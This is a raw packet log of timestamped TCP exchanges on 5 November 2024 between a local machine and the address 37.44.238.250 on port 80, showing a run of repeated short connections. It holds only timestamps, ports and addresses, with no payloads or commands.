                                                                                            Nov 5, 2024 23:54:01.150899887 CET5010480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:01.155699015 CET805010537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:01.155788898 CET5010580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:01.155915022 CET5010580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:01.160963058 CET805010537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:01.199373960 CET805010437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:01.275430918 CET5010680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:01.280327082 CET805010637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:01.280414104 CET5010680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:01.280555964 CET5010680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:01.285471916 CET805010637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:01.436718941 CET805010437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:01.436780930 CET5010480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:01.508769989 CET5010580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:01.513631105 CET805010537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:01.513860941 CET805010537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:01.633902073 CET5010680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:01.638859987 CET805010637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:01.971863031 CET805010537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:02.024139881 CET5010580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:02.043348074 CET805010537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:02.091809034 CET805010637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:02.168530941 CET805010637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:02.168622971 CET5010680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:02.211673021 CET5010580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:02.298728943 CET5010580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:02.298804998 CET5010680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:02.300107956 CET5010780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:02.304014921 CET805010537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:02.304074049 CET5010580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:02.304626942 CET805010637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:02.304696083 CET5010680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:02.304923058 CET805010737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:02.304982901 CET5010780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:02.305124998 CET5010780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:02.310175896 CET805010737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:02.649226904 CET5010780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:02.654104948 CET805010737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:03.123668909 CET805010737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:03.201994896 CET805010737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:03.202142954 CET5010780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:03.319430113 CET5010880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:03.324244976 CET805010837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:03.324321985 CET5010880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:03.324435949 CET5010880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:03.329233885 CET805010837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:03.680490017 CET5010880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:03.685358047 CET805010837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:04.134897947 CET805010837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:04.210491896 CET805010837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:04.210566044 CET5010880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:04.434509993 CET5010880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:04.435751915 CET5010980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:04.440249920 CET805010837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:04.440309048 CET5010880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:04.440613031 CET805010937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:04.440676928 CET5010980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:04.440805912 CET5010980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:04.445792913 CET805010937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:04.791635990 CET5010980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:04.798904896 CET805010937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:05.252974033 CET805010937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:05.323292017 CET805010937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:05.323353052 CET5010980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:05.445846081 CET5010980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:05.446068048 CET5010780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:05.446765900 CET5011080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:05.451280117 CET805010937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:05.451354027 CET5010980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:05.451699972 CET805011037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:05.451874971 CET5011080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:05.452039957 CET5011080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:05.457689047 CET805011037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:05.805568933 CET5011080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:05.810484886 CET805011037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:06.255124092 CET805011037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:06.329037905 CET805011037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:06.329102039 CET5011080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:06.627473116 CET5011080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:06.627779007 CET5011180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:06.632582903 CET805011137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:06.632658005 CET5011180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:06.632776022 CET5011180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:06.633677959 CET805011037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:06.633729935 CET5011080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:06.638823986 CET805011137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:07.103657007 CET5011180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:07.108536959 CET805011137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:07.137002945 CET5011280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:07.141902924 CET805011237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:07.142023087 CET5011280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:07.254446983 CET5011280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:07.255276918 CET5011180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:07.259394884 CET805011237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:07.260720015 CET805011137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:07.260777950 CET5011180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:07.540831089 CET5011380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:07.545773029 CET805011337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:07.545860052 CET5011380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:07.545978069 CET5011380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:07.550916910 CET805011337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:07.602330923 CET5011280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:07.607687950 CET805011237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:07.607706070 CET805011237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:07.899245024 CET5011380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:07.904182911 CET805011337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:07.964236975 CET805011237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:08.024147987 CET5011280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:08.045305967 CET805011237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:08.227247953 CET5011280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:08.359348059 CET805011337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:08.433065891 CET805011337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:08.433130026 CET5011380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:08.564448118 CET5011280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:08.564532995 CET5011380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:08.565314054 CET5011480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:08.569499016 CET805011237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:08.569547892 CET5011280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:08.570255041 CET805011437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:08.570321083 CET5011480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:08.570357084 CET805011337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:08.570400000 CET5011380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:08.570498943 CET5011480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:08.575289965 CET805011437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:08.915697098 CET5011480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:08.920591116 CET805011437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:09.380712986 CET805011437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:09.446021080 CET5011480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:09.457796097 CET805011437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:09.555380106 CET5011480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:09.586369038 CET5011480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:09.587420940 CET5011580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:09.591667891 CET805011437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:09.591722965 CET5011480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:09.592293978 CET805011537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:09.592377901 CET5011580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:09.592510939 CET5011580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:09.597760916 CET805011537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:09.946111917 CET5011580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:09.951189995 CET805011537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:10.403675079 CET805011537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:10.479734898 CET805011537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:10.479809999 CET5011580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:10.606611967 CET5011580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:10.607410908 CET5011680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:10.612066031 CET805011537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:10.612112045 CET5011580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:10.612255096 CET805011637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:10.612323999 CET5011680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:10.612543106 CET5011680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:10.617333889 CET805011637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:10.961744070 CET5011680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:10.966613054 CET805011637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:11.436425924 CET805011637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:11.506879091 CET805011637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:11.510025978 CET5011680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:11.631546974 CET5011680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:11.632256985 CET5011780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:11.637271881 CET805011737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:11.637342930 CET5011780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:11.637455940 CET5011780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:11.637635946 CET805011637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:11.637696028 CET5011680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:11.642941952 CET805011737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:11.992942095 CET5011780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:11.998526096 CET805011737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:12.457803011 CET805011737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:12.524127007 CET5011780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:12.536762953 CET805011737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:12.666055918 CET5011780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:12.666642904 CET5011880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:12.671596050 CET805011737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:12.671608925 CET805011837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:12.671653032 CET5011780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:12.671689034 CET5011880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:12.671814919 CET5011880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:12.676570892 CET805011837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:13.024193048 CET5011880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:13.029136896 CET805011837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:13.057979107 CET5011980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:13.058506966 CET5011880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:13.062836885 CET805011937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:13.066018105 CET5011980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:13.066154957 CET5011980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:13.070929050 CET805011937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:13.107204914 CET805011837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:13.256244898 CET805011837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:13.258018017 CET5011880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:13.265922070 CET5012080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:13.270823956 CET805012037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:13.274027109 CET5012080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:13.274378061 CET5012080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:13.279205084 CET805012037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:13.414905071 CET5011980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:13.419799089 CET805011937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:13.419892073 CET805011937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:13.633609056 CET5012080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:13.638539076 CET805012037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:13.875760078 CET805011937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:13.953942060 CET805011937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:13.958064079 CET5011980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:14.094239950 CET805012037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:14.149199963 CET5012080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:14.167088032 CET805012037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:14.211673975 CET5012080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:14.287473917 CET5011980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:14.287528992 CET5012080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:14.290457964 CET5012180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:14.293661118 CET805011937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:14.293992043 CET5011980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:14.294627905 CET805012037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:14.295694113 CET5012080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:14.296494961 CET805012137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:14.296567917 CET5012180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:14.296658993 CET5012180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:14.301444054 CET805012137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:14.649203062 CET5012180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:14.654084921 CET805012137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:15.110356092 CET805012137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:15.180246115 CET805012137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:15.180299044 CET5012180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:15.302143097 CET5012180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:15.303565025 CET5012280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:15.307280064 CET805012137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:15.307329893 CET5012180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:15.308442116 CET805012237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:15.308501959 CET5012280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:15.308584929 CET5012280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:15.313973904 CET805012237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:15.664985895 CET5012280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:15.669929981 CET805012237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:16.130914927 CET805012237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:16.209439039 CET805012237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:16.210024118 CET5012280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:16.336031914 CET5012380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:16.341078997 CET805012337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:16.342014074 CET5012380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:16.342113972 CET5012380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:16.346883059 CET805012337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:16.696072102 CET5012380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:16.701093912 CET805012337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:17.159926891 CET805012337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:17.211632967 CET5012380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:17.238702059 CET805012337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:17.289750099 CET5012380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:17.363445997 CET5012380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:17.364054918 CET5012480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:17.368727922 CET805012337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:17.368797064 CET5012380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:17.369369030 CET805012437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:17.369432926 CET5012480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:17.369514942 CET5012480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:17.374353886 CET805012437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:17.727329016 CET5012480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:17.732332945 CET805012437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:18.173288107 CET805012437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:18.249480009 CET805012437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:18.249562979 CET5012480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:18.371085882 CET5012480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:18.373255968 CET5012580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:18.376574993 CET805012437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:18.376631021 CET5012480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:18.378114939 CET805012537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:18.378171921 CET5012580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:18.378263950 CET5012580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:18.383102894 CET805012537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:18.727356911 CET5012580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:18.732285976 CET805012537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:18.962306023 CET5012580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:18.962877989 CET5012680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:19.083084106 CET5012780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:19.150048971 CET805012637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:19.150069952 CET805012737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:19.150142908 CET5012680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:19.150240898 CET5012780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:19.150240898 CET5012780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:19.150259018 CET5012680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:19.150692940 CET805012537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:19.150739908 CET5012580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:19.158299923 CET805012737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:19.158308983 CET805012637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:19.508591890 CET5012680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:19.508591890 CET5012780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:19.513504028 CET805012637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:19.513586998 CET805012637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:19.513621092 CET805012737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:19.964112043 CET805012637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:19.964268923 CET805012737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:20.008492947 CET5012680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:20.008510113 CET5012780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:20.032934904 CET805012737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:20.045540094 CET805012637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:20.086627007 CET5012780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:20.086637974 CET5012680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:20.157139063 CET5012680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:20.157217026 CET5012780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:20.157752037 CET5012880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:20.162358999 CET805012637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:20.162451982 CET5012680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:20.162543058 CET805012837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:20.162636042 CET5012880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:20.162725925 CET5012880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:20.162728071 CET805012737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:20.162786007 CET5012780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:20.167599916 CET805012837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:20.508552074 CET5012880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:20.513535023 CET805012837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:20.985436916 CET805012837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:21.056068897 CET805012837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:21.056132078 CET5012880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:21.177593946 CET5012880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:21.178179979 CET5012980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:21.182812929 CET805012837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:21.182871103 CET5012880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:21.182955980 CET805012937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:21.183082104 CET5012980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:21.183181047 CET5012980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:21.187901020 CET805012937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:21.539843082 CET5012980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:21.544836998 CET805012937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:21.994848013 CET805012937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:22.071748018 CET805012937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:22.071810007 CET5012980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:22.200908899 CET5012980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:22.201658964 CET5013080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:22.206501961 CET805012937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:22.206515074 CET805013037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:22.206556082 CET5012980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:22.206619024 CET5013080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:22.206775904 CET5013080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:22.211723089 CET805013037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:22.555428028 CET5013080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:22.560307980 CET805013037.44.238.250192.168.2.4
